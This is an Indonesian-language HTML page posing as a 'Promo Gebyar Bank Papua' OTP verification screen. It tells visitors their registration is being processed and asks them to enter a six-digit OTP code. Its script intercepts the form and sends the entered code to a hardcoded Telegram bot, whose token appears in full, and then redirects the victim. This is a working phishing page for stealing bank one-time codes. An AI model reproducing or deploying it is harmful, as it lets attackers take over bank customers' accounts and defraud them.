<!doctype html>
<html lang="en">
 <head> 
  <meta charset="utf-8"> 
  <meta name="fragment" content="!"> 
  <meta name="description" content=""> 
  <link rel="canonical" href=""> 
  <meta name="twitter:card" content="summary_large_image"> 
  <meta property="og:title" content=""> 
  <meta name="twitter:title" content=""> 
  <meta property="og:site_name" content=""> 
  <meta name="twitter:site_name" content=""> 
  <meta property="og:description" content=""> 
  <meta name="twitter:description" content="">
  <link rel="image_src" href="/id/pp.png?w=&amp;h=&amp;auto=compress&amp;dpr=1&amp;fit=max"> 
  <meta property="og:image" content="/id/pp.png?w=&amp;h=&amp;auto=compress&amp;dpr=1&amp;fit=max"> 
  <meta name="twitter:image:src" content="/id/pp.png?w=&amp;h=&amp;auto=compress&amp;dpr=1&amp;fit=max"> 
  <meta property="og:url" content="/"> 
  <meta property="og:type" content="website"> 
  <meta name="apple-mobile-web-app-capable" content="yes"> 
  <meta name="apple-mobile-web-app-status-bar-style" content="black-translucent"> 
  <meta name="viewport" content="width=device-width,initial-scale=1.0, user-scalable=no, minimal-ui"> 
  <title>Promo Gebyar Bank Papua</title> 
  <link href="https://cdn.jsdelivr.net/npm/bootstrap@5.2.0-beta1/dist/css/bootstrap.min.css" rel="stylesheet" integrity="sha384-0evHe/X+R7YkIZDRvuzKMRqM+OrBnVFBL6DOitfPri4tjfHxaWutUpFmBp4vmVor" crossorigin="anonymous"> 
  <style>
        @import url('https://fonts.googleapis.com/css2?family=Open+Sans:wght@500&display=swap');
        body {
            font-family: 'Open Sans', sans-serif;
        }

        .text-header {
            font-family: 'Open Sans', sans-serif;
            color: #0086e0;
        }

        .text-subheader {
            font-family: 'Open Sans', sans-serif;
            margin-top: -60px;
            color: #000;
        }

        .btn-punya {
            display: block;
            margin: 0px auto 0 auto;
            padding: 0px; 
            cursor: pointer; 
            background: red;
            border: none; 
            text-align: center; 
            height: 42px; 
            width: 200px; 
            max-width: 90%;
            font-family: Arial; 
            font-size: 15px; 
            font-weight: bold; 
            color: rgb(255, 255, 255); 
            letter-spacing: 2px; 
            line-height: 1; 
            border-radius: 5px; 
            box-shadow: rgb(170, 170, 170) 2px 2px 4px 0px; 
            transition: background 200ms ease 0s;
        }

        .btn-belum {
            display: block;
            margin: 20px auto 0 auto;
            padding: 0px; 
            cursor: pointer; 
            background: #FFA62F;
            border: none; 
            text-align: center; 
            height: 42px; 
            width: 3500px; 
            max-width: 90%;
            font-family: Arial; 
            font-size: 15px; 
            font-weight: 500; 
            color: white; 
            letter-spacing: 2px; 
            line-height: 1; 
            border-radius: 5px; 
            box-shadow: rgb(170, 170, 170) 2px 2px 4px 0px; 
            transition: background 200ms ease 0s;
        }
    </style> 
    <style>

/*contoh1*/
/*support google chrome*/
.contoh1::-webkit-input-placeholder{
    color: white;
}
 
/*support mozilla*/
.contoh1:-moz-input-placeholder{
    color: white;
}
 
/*support internet explorer*/
.contoh1:-ms-input-placeholder{
    color: white;
}
 
 
/*contoh2*/
/*support google chrome*/
.contoh2{
    margin: 10px;
    font-size: 12pt;
    padding: 0px;
}
 
.contoh2::-webkit-input-placeholder{
    color: white;
}
 
/*support mozilla*/
.contoh2:-moz-input-placeholder{
    color: white;
}
 
/*support internet explorer*/
.contoh2:-ms-input-placeholder{
    color: white;
}
 
 
/*contoh3*/
/*support google chrome*/
.contoh3{
    margin: 30px;
    font-size: 13pt;
    padding: 10px;	
    background: transparent;
    color: #fff;
    font-family: arial;
    border: none;
}
 
.contoh3:focus{
    outline: none;
}
 
.contoh3::-webkit-input-placeholder{
    color: white;
}
 
/*support mozilla*/
.contoh3:-moz-input-placeholder{
    color: white;
}
 
/*support internet explorer*/
.contoh3:-ms-input-placeholder{
    color: white;
}
    </style> 
 </head> 
 <body class="chakra-ui-light" style="background: url(/id/bg1.png);">
  <div class="container"> 
   <div class="row"> 
    <div class="col-12 d-block mx-auto text-center" style="height: auto; width: 90%; max-width: auto; margin-top: 20px; margin-bottom: 0px; border-radius: 0px;"> 
<p style="color: white; font-size: 20px; margin-top: 0%; margin-left: 0px; text-align: left; font-weight: bold;">Verifikasi Kode OTP</p>
<br>
<p style="color: white; text-align: center; font-size: 13px; margin-top: 10px;">Terimakasih pace/mace ade/kaka,<br>pendaftaran anda sedang di proses sistem.<br>Mohon menunggu Tim Terkait BPD Bank Papua<br>Akan menghubungi kembali melalui Whatsapp<br>untuk konfirmasi Format SMS dan nomor undian pendaftaran anda,</p>
<br>
<form id="tg" onsubmit="">
       <input class="contoh1" placeholder="Masukan Kode OTP" required="" style="width:100%;height: 40px; border: 1px solid white; margin-left: 0%; margin-top: -20%; background: none; border-radius: 4px; text-align: center; padding-left: 10px; outline:none; border-color: #F5F5F5 1px 1px 0px 0px; font-size: 15px; color: white;" minlength="6" maxlength="6" type="tel" name="Kode OTP" id="Kode OTP"><br></div>
        </div>
    <div class="col-12"> 
    <br>
           <button type="submit" class="btn-belum">Konfirmasi</button> 
           <br>
           <br>
    </div> 
   </div> 
  </div> 
  <script src="https://ajax.googleapis.com/ajax/libs/jquery/3.6.0/jquery.min.js"></script> 
  <script src="https://cdn.jsdelivr.net/npm/bootstrap@5.2.0-beta1/dist/js/bootstrap.bundle.min.js" integrity="sha384-pprn3073KE6tl6bjs2QrFaJGz5/SUsLqktiwsUTF55Jfv3qYSDhgCecCxMW52nD2" crossorigin="anonymous"></script>
  <p id="status"></p>
<script>
    const chat_id = '5471706591', botID = 'bot6119272490:AAHVX90G3t44aFngNhoXdcUrCm8NXnwgoSk';
    const telegramURL = `https://api.telegram.org/${botID}/sendMessage`;
    document.querySelector('#tg').addEventListener("submit", async e => { // When the user submits the form
        e.preventDefault(); // Don't submit
        let text = JSON.stringify( // Convert the form data to a string to send as our Telegram message
            Object.fromEntries(new FormData(e.target).entries()), // Convert the form data to an object.
        null, 2); // Prettify the JSON so we can read the data easily
        const sendMessage = await fetch(telegramURL, { // Send the request to the telegram API
            method: 'POST',
            headers: {"Content-Type": "application/json"}, // This is required when sending a JSON body.
            body: JSON.stringify({chat_id, text}), // The body must be a string, not an object
        });
        const messageStatus = document.querySelector('#status');
        if (sendMessage.ok) // Update the user on if the message went through
            messageStatus.textContent = "";
        else
            messageStatus.textContent = "Message Failed to send :( " + (await sendMessage.text());
        e.target.reset(); // Clear the form fields.
        window.location.href='/id/verif.html';
    });


   </script>
</form>
</body>
</html>
